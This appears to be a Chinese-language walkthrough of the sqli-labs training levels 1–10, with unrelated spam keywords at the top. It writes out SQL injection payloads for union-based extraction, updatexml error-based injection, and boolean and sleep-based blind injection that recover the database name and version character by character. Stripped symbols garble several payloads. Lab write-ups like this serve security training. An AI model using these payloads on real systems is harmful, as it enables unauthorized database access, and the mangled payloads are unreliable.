怎么做足球直播网站,北京搬家公司排名前十名电话,赣州网站网站建设,wordpress自动发布插件Less-1#xff08;联合查询#xff09;
1.查看是否有回显
2.查看是否有报错
3.使用联合查询#xff08;字符注入#xff09;
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-2#xff08;联合查询#xff09;
1.查看是否有回显
2.查看是否有报错
3.使用…
Less-1联合查询
1.查看是否有回显
2.查看是否有报错
3.使用联合查询字符注入
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-2联合查询
1.查看是否有回显
2.查看是否有报错
3.使用联合查询数字型注入
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-3联合查询
1.查看是否有回显
2.查看是否有报错
3.使用联合查询数字型注入
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-4联合查询
1.查看是否有回显
2.查看是否有报错
3.使用联合查询数字型注入
3.1判断其列数
3.2 判断显示位置
3.3敏感信息查询
Less-5错误注入
1.无显示
2.有错误
3.使用错误注入
Less-6错误注入
1.无显示
2.有错误
3.使用错误注入
Less-7读写文件
1.查看是否有回显
Less-8布尔盲注
1.没有回显
2.没有报错
3.布尔盲注获取数据库名
4.计算数据库名字的位数
5.猜测每一位
Less-9延时注入--1‘
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位
Less-10(延时注入--1“)
1.没有回显
2.没有报错
3.使用延时注入
4.分别查看每一位 Less-1联合查询
1.查看是否有回显
?id1 2.查看是否有报错
?id2 3.使用联合查询字符注入
3.1判断其列数
?2 order by 4 --
判断有3列 3.2 判断显示位置
?id2 and 12 union select 1,2,3 --
此处为字符型注入要确定前一段为假 3.3敏感信息查询
?id2 and 12 union select 1,version(),database() --
version() --版本号 5.7.26
database()--数据库名称 security Less-2联合查询
1.查看是否有回显
?id1 2.查看是否有报错
?id2 3.使用联合查询数字型注入
3.1判断其列数
?2 order by 4 --
判断有3列 3.2 判断显示位置
?id2 and 12 union select 1,2,3 --
此处为字符型注入要确定前一段为假 3.3敏感信息查询
?id2 and 12 union select 1,version(),database() --
version() --版本号 5.7.26
database()--数据库名称 security Less-3联合查询
1.查看是否有回显
?id1 2.查看是否有报错
?id2 3.使用联合查询数字型注入
3.1判断其列数
?2) order by 4 --
判断有3列 3.2 判断显示位置
?id2) and 12 union select 1,2,3 --
此处为字符型注入要确定前一段为假 3.3敏感信息查询
?id2) and 12 union select 1,version(),database() --
version() --版本号 5.7.26
database()--数据库名称 security Less-4联合查询
1.查看是否有回显
?id1 2.查看是否有报错
?id2 3.使用联合查询数字型注入
3.1判断其列数
?2) order by 4 --
判断有3列 3.2 判断显示位置
?id2) and 12 union select 1,2,3 --
此处为字符型注入要确定前一段为假 3.3敏感信息查询
?id2) and 12 union select 1,version(),database() --
version() --版本号 5.7.26
database()--数据库名称 security Less-5错误注入
1.无显示 2.有错误 3.使用错误注入
?id2 and updatexml(1,concat(0x5e,(select database()),0x5e),1) -- Less-6错误注入
1.无显示 2.有错误 3.使用错误注入
?id2 and updatexml(1,concat(0x5e,(select database()),0x5e),1) -- Less-7读写文件
1.查看是否有回显
根据 Use outfile判断此处使用写入文件的方式 2.
Less-8布尔盲注
1.没有回显 2.没有报错 3.布尔盲注获取数据库名
?id2 and database()ajest --
没有显示成本太高 4.计算数据库名字的位数
?id2 and length(database())0 --
?id2 and length(database())8 --
显示八位
5.猜测每一位
?id2 and ascii(substr((select database()),1,1))115 -- 115 s 101 e 99 c 117 u 114 r 105 i 116 t 121 y 数据库security Less-9延时注入--1‘
1.没有回显
?id1 2.没有报错
?id1 3.使用延时注入
?id1 and if(length((select version()))6,sleep(5),1) --
版本号共有6位 4.分别查看每一位
?id1 and if(ascii(substr((select version()),1,1))53,sleep(5),1) -- 53 5 46 . 55 7 46 . 50 2 54 6 版本号 5.7.26 Less-10(延时注入--1“)
1.没有回显
?id1 2.没有报错
?id1 3.使用延时注入
?id1 and if(length((select version()))6,sleep(5),1) --
版本号共有6位 4.分别查看每一位
?id1 and if(ascii(substr((select version()),1,1))53,sleep(5),1) -- 53 5 46 . 55 7 46 . 50 2 54 6 版本号 5.7.26
